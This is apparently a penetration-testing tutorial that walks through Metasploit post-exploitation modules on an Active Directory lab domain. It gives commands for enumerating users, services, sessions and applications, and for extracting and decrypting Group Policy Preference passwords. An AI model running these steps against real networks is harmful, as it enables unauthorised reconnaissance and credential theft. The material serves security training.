Kali Linux, Penetration Testing

Penetration Testing in Active Directory using Metasploit (Part 2)

Enumerate all logged on users

 This module will enumerate current and recently logged on Windows users.

msf > use post/windows/gather/enum_logged_on_users

msf post(enum_logged_on_users) > set session 1

msf post(enum_logged_on_users) > exploit

Gather All Group Policy Preference 

This module enumerates the victim machine’s domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsoft’s public AES key. Cached Group Policy files may if the group policy object is deleted rather than unlinked. Tested on WinXP SP3 Client and Win2k8 R2 DC.

msf > use post/windows/gather/credentials/gpp

msf post(gpp) > set session 1

msf post(gpp) > exploit

Find All DNS Service Records

Enumerates know SRV Records for a given domain using target host DNS query tool.

msf > use post/multi/gather/dns_srv_lookup

msf post(dns_srv_lookup) > set domain rajlab.com

msf post(dns_srv_lookup) > set session 1

msf post(dns_srv_lookup) > exploit

Find All Services in Server

This module will query the system for services and display name and configuration info for each returned service. It allows you to optionally search the credentials, path, or start type for a string and only return the results that match. These query operations are cumulative and if no query strings are specified, it just returns all services. NOTE: If the script hangs, windows firewall is most likely on and you did not migrate to a safe process (explorer.exe for example)

msf > use post/windows/gather/enum_services

msf post(enum_services) > set session 1

msf post(enum_services) > exploit

Find All Active Directory TCP sessions

 This Module lists current TCP sessions.

msf > use post/windows/gather/tcpnetstat

msf post(tcpnetstat) > set session 1

msf post(tcpnetstat) > exploit

Find All Installed Application in Server

 This module will enumerate all installed applications

msf > use post/windows/gather/enum_applications

msf post(enum_applications) > set session 1

msf post(enum_applications) > exploit

Find All Remote Desktop Session

 This module dumps MRU and connection data for RDP sessions.

msf > use post/windows/gather/enum_termserv 

msf post(enum_termserv) > set session 1

msf post(enum_termserv) > exploit